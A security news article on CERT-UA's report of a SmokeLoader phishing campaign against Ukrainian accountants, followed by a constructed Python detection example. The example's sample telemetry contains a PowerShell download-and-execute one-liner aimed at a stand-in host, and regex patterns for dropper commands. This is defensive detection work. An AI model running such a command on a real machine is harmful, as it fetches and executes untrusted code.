SmokeLoader operation strikes Ukraine with a phishing campaign

May 30, 2023

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of an ongoing phishing campaign that distributes the SmokeLoader malware, delivered inside a polyglot archive.

The investigation has not yet identified the operators behind the campaign. According to the report, the threat actors send the emails from compromised accounts, with subject lines referring to bills or payments, and attach a ZIP archive.

The SmokeLoader operators use a JavaScript loader as the first stage of the intrusion and follow it with further attacks.

According to the investigation, the campaign relies on a JavaScript file that invokes PowerShell to download an executable and run it, and that executable then launches SmokeLoader.

The ZIP attachment is a polyglot archive: it contains a decoy document alongside the JavaScript file. When the script runs, it calls PowerShell to fetch and execute the payload, and this chain is what allows the attackers to deploy SmokeLoader on the victim's machine.

Analysis of the campaign samples and of the domain name registrations indicates that the attack began last month: both the registration dates and the file compilation timestamps point to April 2023.

SmokeLoader is a loader for other malware. Once executed on a system, it injects malicious code into a running explorer.exe process and can then download additional payloads onto the host.

CERT-UA attributes the attack to a financially motivated threat group that may have been active in the cybercriminal landscape for years. The group specifically targets accountants, compromising their machines to steal credentials and carry out unauthorised fund transfers.

CERT-UA also noted that these actors commonly use JavaScript loaders in the initial stage of an attack, and it recommends blocking the launch of wscript[.]exe on workstations to reduce the chance that such an attack succeeds.
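Blocking wscript.exe is the preventive control; the detection side of the same chain (Windows Script Host spawning PowerShell with a download-and-execute command line, followed by a remote thread into explorer.exe, as described in the paragraphs above) is shown here as an added example. This is not code from CERT-UA or from the article; the Sysmon-like event shape, the field names and the sample events are all constructed for illustration.

```python
"""Detect the SmokeLoader-style delivery chain in process telemetry.

Chain: wscript.exe / cscript.exe -> powershell.exe (download + run payload)
       -> payload injects into explorer.exe.

The events below are CONSTRUCTED in a Sysmon-like shape (Event ID 1 = process
creation, Event ID 8 = CreateRemoteThread); they are not campaign telemetry,
and the field names are an assumption of this example.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int            # 1 = process create, 8 = CreateRemoteThread
    pid: int
    image: str               # full path of the (source) process image
    ppid: int = 0            # parent pid (event 1 only)
    command_line: str = ""   # command line (event 1 only)
    target_image: str = ""   # process injected into (event 8 only)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Download primitives typically seen in one-line PowerShell droppers.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient"
    r"|start-bitstransfer|\bcurl\b|\bwget\b", re.IGNORECASE)
# Execution primitives used to run whatever was just fetched.
EXECUTE_RE = re.compile(
    r"start-process|\bsaps\b|invoke-expression|\biex\b|invoke-item"
    r"|cmd(\.exe)?\s+/c", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_download_and_execute(command_line: str) -> bool:
    """True when a command line both fetches something and runs something."""
    return bool(DOWNLOAD_RE.search(command_line)) and bool(EXECUTE_RE.search(command_line))


def detect(events):
    """Return (rule_name, pid) tuples, in event order, for matching events."""
    created = {e.pid: e for e in events if e.event_id == 1}  # assumes pids unique in window
    alerts = []
    for e in events:
        if e.event_id == 1 and basename(e.image) == "powershell.exe":
            parent = created.get(e.ppid)
            if (parent and basename(parent.image) in SCRIPT_HOSTS
                    and is_download_and_execute(e.command_line)):
                alerts.append(("script_host_spawns_powershell_downloader", e.pid))
        elif e.event_id == 8 and basename(e.target_image) == "explorer.exe":
            alerts.append(("remote_thread_into_explorer", e.pid))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry, not real campaign data
    Event(1, 4100, r"C:\Windows\explorer.exe", ppid=800, command_line="explorer.exe"),
    # Victim double-clicks the .js inside the "invoice" archive.
    Event(1, 4212, r"C:\Windows\System32\wscript.exe", ppid=4100,
          command_line=r'"C:\Windows\System32\wscript.exe" "C:\Users\acct\Downloads\invoice\invoice.js"'),
    # The script calls PowerShell to fetch and run an executable.
    Event(1, 4260, PS, ppid=4212,
          command_line=("powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                        ".DownloadFile('http://example.invalid/p.exe','$env:TEMP\\p.exe');"
                        " Start-Process $env:TEMP\\p.exe\"")),
    Event(1, 4310, r"C:\Users\acct\AppData\Local\Temp\p.exe", ppid=4260,
          command_line=r"C:\Users\acct\AppData\Local\Temp\p.exe"),
    # The payload injects into explorer.exe (loader behaviour described above).
    Event(8, 4310, r"C:\Users\acct\AppData\Local\Temp\p.exe", target_image=r"C:\Windows\explorer.exe"),
    # Benign: admin downloads a tool from an Explorer-launched PowerShell (no script-host parent).
    Event(1, 5000, PS, ppid=4100,
          command_line="powershell.exe -c \"Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip\""),
    # Benign: logon script under wscript that runs a harmless PowerShell command.
    Event(1, 5100, r"C:\Windows\System32\wscript.exe", ppid=800, command_line="wscript.exe logon.vbs"),
    Event(1, 5110, PS, ppid=5100, command_line="powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule} pid={pid}")
```

The two benign events matter: a parent-child rule on wscript.exe alone would fire on every logon script, and a "PowerShell downloads something" rule alone would fire on administrators. Requiring both the script-host parent and a download-plus-execute command line keeps the rule aligned with the chain CERT-UA describes, while the explorer.exe CreateRemoteThread rule catches the loader stage even if the delivery stage was missed. Pair this with the preventive control: alongside blocking wscript.exe, Microsoft Defender's attack surface reduction rule "Block JavaScript or VBScript from launching downloaded executable content" targets exactly this first hop.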

Earlier this month, the agency also disclosed a cyberattack by the Russia-backed Sandworm APT against the Ukrainian public sector, in which the threat actors allegedly gained access to public-sector networks using VPN credentials.
